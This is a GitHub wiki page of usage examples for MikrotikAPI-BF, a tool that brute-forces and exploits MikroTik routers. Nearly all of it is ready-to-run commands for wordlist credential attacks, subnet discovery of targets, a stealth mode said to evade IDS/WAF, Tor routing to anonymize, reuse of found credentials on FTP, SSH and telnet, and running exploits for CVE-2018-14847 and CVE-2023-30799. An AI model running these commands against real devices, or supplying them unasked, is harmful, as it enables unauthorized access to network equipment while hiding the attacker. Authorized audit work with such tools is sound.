Usage Examples - mrhenrike/MikrotikAPI-BF GitHub Wiki
Usage Examples
Language: English · Português (pt-BR)
Basic Credential Tests
# Single username + password
python mikrotikapi-bf.py -t 192.168.88.1 -U admin -P admin
# Try admin with empty password
python mikrotikapi-bf.py -t 192.168.88.1 -U admin -P ""
# Try multiple combos from a combo file
python mikrotikapi-bf.py -t 192.168.88.1 -d examples/combos.txt --progress
Wordlist Attacks
# Separate username + password wordlists
python mikrotikapi-bf.py -t 192.168.88.1 \
-u examples/usernames.txt \
-p examples/passwords.txt \
--progress
# Custom wordlists
python mikrotikapi-bf.py -t 192.168.88.1 \
-u /path/to/users.txt \
-p /path/to/pass.txt \
--threads 10 \
--progress
Network Discovery
# Discover all Mikrotik devices on a /24 subnet
python mikrotikapi-bf.py --discover -n 192.168.1.0/24 --threads 50 --progress
# Output discovered IPs to file for later use
python mikrotikapi-bf.py --discover -n 192.168.1.0/24 -o discovered_hosts.txt
Stealth Mode
# Fibonacci delays + User-Agent rotation (evade IDS/WAF)
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --stealth
# Set custom delay range
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --stealth --delay-min 2 --delay-max 8
Proxy / Tor
# Route through Tor (anonymize)
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt \
--proxy socks5://127.0.0.1:9050 \
--threads 1 \
--progress
# Route through HTTP proxy
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt \
--proxy http://proxy.example.com:8080
Post-Login Validation
# After finding credentials, validate access via other services
python mikrotikapi-bf.py -t 192.168.88.1 -U admin -P found_password \
--validate ftp,ssh,telnet \
--progress \
-vv
Session Resume
# Start attack with auto-save sessions
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --session my_attack
# Resume a previously interrupted attack
python mikrotikapi-bf.py --resume my_attack
Export and Reporting
# Export to all formats (JSON, CSV, XML, TXT)
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --export-all
# Export to specific format
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --export-json
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --export-csv
# Generate professional audit report
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --export-all --audit-report
# Custom export directory
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt \
--export-all \
--export-dir /tmp/audit_results
Fingerprinting
# Fingerprint only (no attack)
python mikrotikapi-bf.py -t 192.168.88.1 --fingerprint
# Fingerprint + CVE lookup
python mikrotikapi-bf.py -t 192.168.88.1 --fingerprint --nvd
Configuration File
# Run from YAML config
python mikrotikapi-bf.py --config config.yaml
Example config.yaml:
target: 192.168.88.1
combo_file: examples/combos.txt
stealth: true
threads: 5
export: [json, csv]
audit_report: true
Run Specific Exploit (v3.10.0+)
python mikrotikapi-bf.py -t 192.168.88.1 --run-exploit CVE-2018-14847
python mikrotikapi-bf.py -t 192.168.88.1 --run-exploit CVE-2023-30799 -U admin -P pass
8-Phase Security Audit (v3.10.0+)
python mikrotikapi-bf.py -t 192.168.88.1 --audit -U admin -P pass --export sarif
python mikrotikapi-bf.py -t 192.168.88.1 --audit -U admin -P pass --export-all
Delay Profiles (v3.6.0+)
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --delay-mode high
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --delay-mode stealth
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --delay-mode custom -s 0.5
See also: API Reference · Stealth Mode · Export